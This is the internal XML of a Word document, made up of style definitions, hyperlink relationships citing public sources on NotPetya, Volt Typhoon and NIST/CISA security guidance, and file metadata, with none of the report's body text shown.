    <w:rsid w:val="00C4327F"/>
    <w:rsid w:val="00C60D92"/>
    <w:rsid w:val="00CD4F13"/>
    <w:rsid w:val="00D04F5C"/>
    <w:rsid w:val="00DA3FF0"/>
    <w:rsid w:val="00E1416F"/>
    <w:rsid w:val="00E311F9"/>
    <w:rsid w:val="00EC71B2"/>
    <w:rsid w:val="00F0144F"/>
    <w:rsid w:val="00F069E9"/>
    <w:rsid w:val="00F60182"/>
    <w:rsid w:val="00FD66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8E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7135"/>
    <w:pPr>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman"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pPr>
      <w:spacing w:line="360" w:lineRule="auto"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="00204F"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading3Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:line="360" w:lineRule="auto"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="073763"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading4Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="007D6DE3"/>
    <w:pPr>
      <w:spacing w:line="360" w:lineRule="auto"/>
      <w:jc w:val="both"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading5">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading5Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="007D6DE3"/>
    <w:pPr>
      <w:spacing w:line="360" w:lineRule="auto"/>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>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7346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6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6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827135"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman"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E4217C"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="00204F"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading3"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="007346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D6DE3"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading5Char">
    <w:name w:val="Heading 5 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading5"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="007D6DE3"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading6Char">
    <w:name w:val="Heading 6 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading6"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="007346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6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6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67D"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="TitleChar">
    <w:name w:val="Title Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Title"/>
    <w:uiPriority w:val="10"/>
    <w:rsid w:val="0073467D"/>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7346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67D"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="0073467D"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="0073467D"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="0073467D"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="007346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467D"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="0073467D"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00933FE6"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00933FE6"/>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paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="007D6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DE3"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="007D6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DE3"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOCHeading">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Heading1"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="007D6DE3"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="240" w:after="0"/>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7D6DE3"/>
    <w:pPr>
      <w:spacing w:after="100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="007D6DE3"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="220"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="007D6DE3"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="440"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TableofFigures">
    <w:name w:val="table of figures"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00261172"/>
    <w:pPr>
      <w:spacing w:after="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="FollowedHyperlink">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00445B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www.cisa.gov/sites/default/files/2023-01/fact-sheet-implementing-phishing-resistant-mfa-508c.pdf" TargetMode="External"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.microsoft.com/en-us/security/blog/2023/05/24/volt-typhoon-targets-us-critical-infrastructure-with-living-off-the-land-techniques/" TargetMode="External"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pages.nist.gov/800-63-4/sp800-63b/authenticators/" TargetMode="External"/><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www.elastic.co/guide/en/security/8.19/cron-job-created-or-modified.html" TargetMode="External"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-207.pdf"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riskandinsurance.com/merck-awarded-1-4-billion-for-notpetya-after-5-years-of-legal-battle/" TargetMode="External"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.wired.com/story/notpetya-cyberattack-ukraine-russia-code-crashed-the-world/"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www.reuters.com/article/business/merck-says-cyber-attack-halted-production-will-hurt-profits-idUSKBN1AD1AO/" TargetMode="External"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S036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crowdstrike.com/en-us/blog/fast-spreading-petrwrap-ransomware-attack-combines-eternalblue-exploit-credential-stealing/" TargetMode="External"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/datasources/" TargetMode="External"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.sipa.columbia.edu/sites/default/files/2022-11/NotPetya%20Final.pdf" TargetMode="Externa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elastic.co/guide/en/security/8.19/cron-job-created-or-modified.html" TargetMode="External"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-53r5.pdf"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www.cisa.gov/news-events/alerts/2017/07/01/petya-ransomware" TargetMode="External"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.sec.gov/Archives/edgar/data/310158/000031015819000014/mrk1231201810k.htm" TargetMode="External"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.axios.com/2018/02/15/white-house-confirms-notpetya-151872878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MHW8r9SeQoMSwt1DINgHEseACg==">CgMxLjAaIwoBMBIeChwIB0IYCg9UaW1lcyBOZXcgUm9tYW4SBUNhcmRvGiUKATESIAoeCAdCGgoPVGltZXMgTmV3IFJvbWFuEgdHdW5nc3VoGiUKATISIAoeCAdCGgoPVGltZXMgTmV3IFJvbWFuEgdHdW5nc3VoGiUKATMSIAoeCAdCGgoPVGltZXMgTmV3IFJvbWFuEgdHdW5nc3VoGiUKATQSIAoeCAdCGgoPVGltZXMgTmV3IFJvbWFuEgdHdW5nc3VoMg5oLnMxZ256d3F4YTBwYjIOaC5zcXphaG1zcTM5d3kyDmguaXZtaXR1Y2JiODcyMg1oLmd6ajl1aGFzZ21wOAByITFyNGJhRzZ1YzZOWHEwdDBvWnVfZ01QV0lKbXB0bFlUNw==</go:docsCustomData>
</go:gDocsCustomXmlDataStorage>
</file>

<file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{B2AA1736-A5B6-4044-B08B-56A5468E1EC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6493</Words>
  <Characters>37016</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2025-12-17T13:13:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-17T13:13:00Z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f2fdfe3e-087f-45b7-803f-631ae3906ba5</vt:lpwstr>
  </property>
</Properties>
</file>